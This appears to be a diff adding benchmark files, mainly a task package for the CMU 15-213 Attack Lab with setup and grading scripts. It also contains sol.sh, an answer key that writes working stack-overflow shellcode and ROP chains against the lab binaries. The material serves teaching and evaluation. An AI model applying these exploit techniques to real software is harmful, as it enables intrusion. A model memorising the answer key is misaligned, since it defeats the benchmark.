sys-intelligence · 777lefty · Dec 11, 2025 · Dec 15, 2025 · Dec 18, 2025 · Dec 18, 2025
diff --git a/benchmarks/courseexam_bench/data/exams_metadata.json b/benchmarks/courseexam_bench/data/exams_metadata.json
@@ -0,0 +1,26 @@
+{
+  "exams": [
+    {
+      "exam_id": "example_course_2024_midterm",
+      "test_paper_name": "Example Systems Course: 2024 Midterm Exam",
+      "course": "Example Systems Course",
+      "institution": "Example University",
+      "year": 2024,
+      "score_total": 59,
+      "score_max": 59.0,
+      "score_avg": 42.0,
+      "score_median": 43,
+      "score_standard_deviation": 9.0,
+      "num_questions": 10
+    },
+    {
+      "exam_id": "cs537_fall_2021_final",
+      "test_paper_name": "CS 537 Fall 2021 Final",
+      "course": "Operating Systems",
+      "institution": "University of Wisconsin-Madison",
+      "year": 2021,
+      "score_total": 60,
+      "num_questions": 59
+    }
+  ]
+}
diff --git a/benchmarks/courseexam_bench/data/questions.jsonl b/benchmarks/courseexam_bench/data/questions.jsonl
diff --git a/benchmarks/courseexam_bench/data/reference_materials/raft_basics.md b/benchmarks/courseexam_bench/data/reference_materials/raft_basics.md
@@ -0,0 +1,7 @@
+# Raft Consensus Algorithm - Quick Reference
+
+This reference sheet provides essential information about the Raft consensus algorithm for distributed systems.
+
+## Overview
+
+Raft is a consensus algorithm designed as an alternative to the Paxos family of algorithms. It was meant to be more understandable than Paxos by means of separation of logic, but it is also formally proven safe and offers some additional features.
diff --git a/benchmarks/courselab_bench/data/cmu_15-213/task_attack_lab/compose.yaml b/benchmarks/courselab_bench/data/cmu_15-213/task_attack_lab/compose.yaml
@@ -0,0 +1,6 @@
+services:
+  default:
+    network_mode: host
+    image: buildpack-deps:jammy
+    command: sleep infinity
+    working_dir: /workspace
diff --git a/benchmarks/courselab_bench/data/cmu_15-213/task_attack_lab/config.json b/benchmarks/courselab_bench/data/cmu_15-213/task_attack_lab/config.json
@@ -0,0 +1,20 @@
+{
+  "instance_id": "cmu_15-213__attack_lab",
+  "course_id": "cmu_15-213",
+  "timeout_minutes": 60,
+  "tags": [
+    "binary-exploitation",
+    "buffer-overflow",
+    "return-oriented-programming",
+    "x86-64",
+    "gdb",
+    "systems-programming"
+  ],
+  "artifacts": [
+    "phase1.txt",
+    "phase2.txt",
+    "phase3.txt",
+    "phase4.txt",
+    "phase5.txt"
+  ]
+}
diff --git a/benchmarks/courselab_bench/data/cmu_15-213/task_attack_lab/evaluate.sh b/benchmarks/courselab_bench/data/cmu_15-213/task_attack_lab/evaluate.sh
@@ -0,0 +1,79 @@
+#!/bin/bash
+set -euo pipefail
+
+echo "=== Evaluating Attack Lab ==="
+cd /workspace
+
+echo "Verifying protected files"
+if [ -f /tmp/checksums/protected.sha256 ]; then
+    sha256sum -c /tmp/checksums/protected.sha256
+else
+    echo "WARN: No protected checksums found; continuing"
+fi
+
+echo "Checking required binaries"
+for bin in ctarget rtarget hex2raw; do
+    if [ ! -x "$bin" ]; then
+        echo "FAIL: $bin is missing or not executable"
+        exit 1
+    fi
+done
+
+echo "Checking solution files"
+solutions=(phase1.txt phase2.txt phase3.txt phase4.txt phase5.txt)
+for sol in "${solutions[@]}"; do
+    if [ ! -f "$sol" ]; then
+        echo "FAIL: Missing solution file $sol"
+        exit 1
+    fi
+    if [ ! -s "$sol" ]; then
+        echo "FAIL: Solution file $sol is empty"
+        exit 1
+    fi
+done
+
+run_phase() {
+    local phase_id="$1"
+    local target_bin="$2"
+    local hex_file="$3"
+    local expect_pattern="$4"
+
+    echo "--- Phase ${phase_id} (${target_bin}) ---"
+    local raw_file="/tmp/raw_phase_${phase_id}.bin"
+
+    if ! ./hex2raw < "$hex_file" > "$raw_file"; then
+        echo "FAIL: hex2raw failed for $hex_file"
+        exit 1
+    fi
+
+    local output
+    local status=0
+    output=$(timeout 30 "./${target_bin}" -q -i "$raw_file" 2>&1) || status=$?
+    echo "$output"
+
+    if [ "$status" -ne 0 ]; then
+        echo "FAIL: ${target_bin} exited with status $status for phase ${phase_id}"
+        exit 1
+    fi
+
+    if echo "$output" | grep -qi "Misfire"; then
+        echo "FAIL: ${target_bin} reported a misfire for phase ${phase_id}"
+        exit 1
+    fi
+
+    if ! echo "$output" | grep -q "$expect_pattern"; then
+        echo "FAIL: Expected success pattern '$expect_pattern' not found for phase ${phase_id}"
+        exit 1
+    fi
+
+    echo "Phase ${phase_id} passed"
+}
+
+run_phase 1 ctarget phase1.txt "Touch1!: You called touch1()"
+run_phase 2 ctarget phase2.txt "Touch2!: You called touch2(0x"
+run_phase 3 ctarget phase3.txt "Touch3!: You called touch3(\""
+run_phase 4 rtarget phase4.txt "Touch2!: You called touch2(0x"
+run_phase 5 rtarget phase5.txt "Touch3!: You called touch3(\""
+
+echo "PASS: All attack lab phases completed"
+exit 0
diff --git a/benchmarks/courselab_bench/data/cmu_15-213/task_attack_lab/preprocess.sh b/benchmarks/courselab_bench/data/cmu_15-213/task_attack_lab/preprocess.sh
@@ -0,0 +1,44 @@
+#!/bin/bash
+set -euo pipefail
+
+echo "=== Setting up CMU 15-213 Attack Lab ==="
+cd /workspace
+
+echo "Installing 32-bit support and GDB"
+apt-get update
+apt-get install -y gcc-multilib gdb
+
+echo "Making binaries executable"
+chmod +x ctarget rtarget hex2raw
+
+echo "Disabling ASLR for deterministic addresses (best-effort)"
+if sysctl -w kernel.randomize_va_space=0; then
+    echo "ASLR disabled"
+elif echo 0 > /proc/sys/kernel/randomize_va_space 2>/dev/null; then
+    echo "ASLR disabled via /proc"
+else
+    echo "WARN: Could not disable ASLR (permissions?). Exploits may be unstable."
+fi
+
+echo "Verifying required files are present"
+required_files="ctarget rtarget hex2raw cookie.txt farm.c README.txt"
+for file in $required_files; do
+    if [ ! -f "$file" ]; then
+        echo "ERROR: Missing required file $file"
+        exit 1
+    fi
+    echo "  ✓ $file"
+done
+
+echo "Creating checksums for protected files"
+mkdir -p /tmp/checksums
+CHECKSUM_FILE=/tmp/checksums/protected.sha256
+: > "$CHECKSUM_FILE"
+protected_files="$required_files"
+for file in $protected_files; do
+    sha256sum "$file" >> "$CHECKSUM_FILE"
+    echo "  Protected: $file"
+done
+
+echo "Setup complete"
+exit 0
diff --git a/benchmarks/courselab_bench/data/cmu_15-213/task_attack_lab/sol.sh b/benchmarks/courselab_bench/data/cmu_15-213/task_attack_lab/sol.sh
@@ -0,0 +1,142 @@
+#!/bin/bash
+# Solution script for CMU 15-213 Attack Lab
+# This script creates the five exploit payload files (phase1.txt – phase5.txt)
+# that drive ctarget / rtarget to the target touch functions.
+#
+# Discovered parameters (via objdump -d / gdb):
+#   Cookie          : 0x59b997fa
+#   Buffer size     : 40 bytes  (sub $0x28,%rsp in getbuf)
+#   Buffer address  : 0x5561dc78  (rsp after alloc, ASLR off for ctarget)
+#   touch1          : 0x4017c0
+#   touch2          : 0x4017ec
+#   touch3          : 0x4018fa
+#
+# ROP gadgets (from rtarget gadget farm):
+#   0x4019ab : pop %rax; nop; ret              (addval_219 + 4)
+#   0x4019a2 : movq %rax, %rdi; ret            (addval_273 + 2)
+#   0x401a06 : movq %rsp, %rax; ret            (addval_190 + 3)
+#   0x4019dd : movl %eax, %edx; nop; ret       (getval_481 + 2)
+#   0x401a34 : movl %edx, %ecx; cmpb %cl,%cl; ret  (getval_159 + 1)
+#   0x401a13 : movl %ecx, %esi; nop; nop; ret  (addval_436 + 2)
+#   0x4019d6 : lea (%rdi,%rsi,1), %rax; ret    (add_xy)
+
+set -euo pipefail
+cd "$(dirname "$0")/starter" 2>/dev/null || cd /workspace
+
+###############################################################################
+# Phase 1 – Code-injection: call touch1
+#   40 bytes padding + overwrite return address with &touch1
+###############################################################################
+cat > phase1.txt << 'EOF'
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+c0 17 40 00 00 00 00 00
+EOF
+
+###############################################################################
+# Phase 2 – Code-injection: call touch2(cookie)
+#   Inject shellcode that sets %rdi = cookie, then returns to touch2.
+#   Shellcode (13 bytes):
+#     48 c7 c7 fa 97 b9 59   movq  $0x59b997fa, %rdi
+#     68 ec 17 40 00          pushq $0x4017ec
+#     c3                      ret
+#   Pad to 40 bytes, then return to buffer start (0x5561dc78).
+###############################################################################
+cat > phase2.txt << 'EOF'
+48 c7 c7 fa 97 b9 59 68
+ec 17 40 00 c3 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+78 dc 61 55 00 00 00 00
+EOF
+
+###############################################################################
+# Phase 3 – Code-injection: call touch3(&cookie_string)
+#   Inject shellcode that sets %rdi = pointer to the ASCII cookie string,
+#   then returns to touch3.  The cookie string is placed on the stack
+#   above the saved return address so it survives the touch3 / hexmatch
+#   stack frames.
+#
+#     Buffer address : 0x5561dc78
+#     Return address : 0x5561dca0  (buf + 0x28)
+#     Cookie string  : 0x5561dca8  (ret addr + 8)
+#
+#   Shellcode (13 bytes):
+#     48 c7 c7 a8 dc 61 55   movq  $0x5561dca8, %rdi
+#     68 fa 18 40 00          pushq $0x4018fa
+#     c3                      ret
+###############################################################################
+cat > phase3.txt << 'EOF'
+48 c7 c7 a8 dc 61 55 68
+fa 18 40 00 c3 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+78 dc 61 55 00 00 00 00
+35 39 62 39 39 37 66 61
+00
+EOF
+
+###############################################################################
+# Phase 4 – ROP: call touch2(cookie)
+#   Gadget chain:
+#     pop %rax          ; 0x4019ab   – load cookie into rax
+#     <cookie>          ; 0x59b997fa
+#     mov %rax, %rdi    ; 0x4019a2   – copy cookie to first arg
+#     <touch2>          ; 0x4017ec
+###############################################################################
+cat > phase4.txt << 'EOF'
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+ab 19 40 00 00 00 00 00
+fa 97 b9 59 00 00 00 00
+a2 19 40 00 00 00 00 00
+ec 17 40 00 00 00 00 00
+EOF
+
+###############################################################################
+# Phase 5 – ROP: call touch3(&cookie_string)
+#   We need %rdi = pointer to ASCII cookie on the stack.  ASLR is on in
+#   rtarget, so we compute the address at runtime using %rsp.
+#
+#   Gadget chain (after 40-byte padding):
+#     mov %rsp, %rax    ; 0x401a06  – capture rsp (points to next slot)
+#     mov %rax, %rdi    ; 0x4019a2  – rdi = captured rsp
+#     pop %rax          ; 0x4019ab  – rax = offset (0x48)
+#     <0x48>
+#     mov %eax, %edx    ; 0x4019dd
+#     mov %edx, %ecx    ; 0x401a34
+#     mov %ecx, %esi    ; 0x401a13
+#     lea (%rdi,%rsi),%rax ; 0x4019d6  – rax = rdi + offset
+#     mov %rax, %rdi    ; 0x4019a2  – rdi = &cookie_string
+#     <touch3>          ; 0x4018fa
+#     "59b997fa\0"      ; ASCII cookie at offset 0x48 from captured rsp
+###############################################################################
+cat > phase5.txt << 'EOF'
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+06 1a 40 00 00 00 00 00
+a2 19 40 00 00 00 00 00
+ab 19 40 00 00 00 00 00
+48 00 00 00 00 00 00 00
+dd 19 40 00 00 00 00 00
+34 1a 40 00 00 00 00 00
+13 1a 40 00 00 00 00 00
+d6 19 40 00 00 00 00 00
+a2 19 40 00 00 00 00 00
+fa 18 40 00 00 00 00 00
+35 39 62 39 39 37 66 61
+00
+EOF
+
+echo "All phase files created."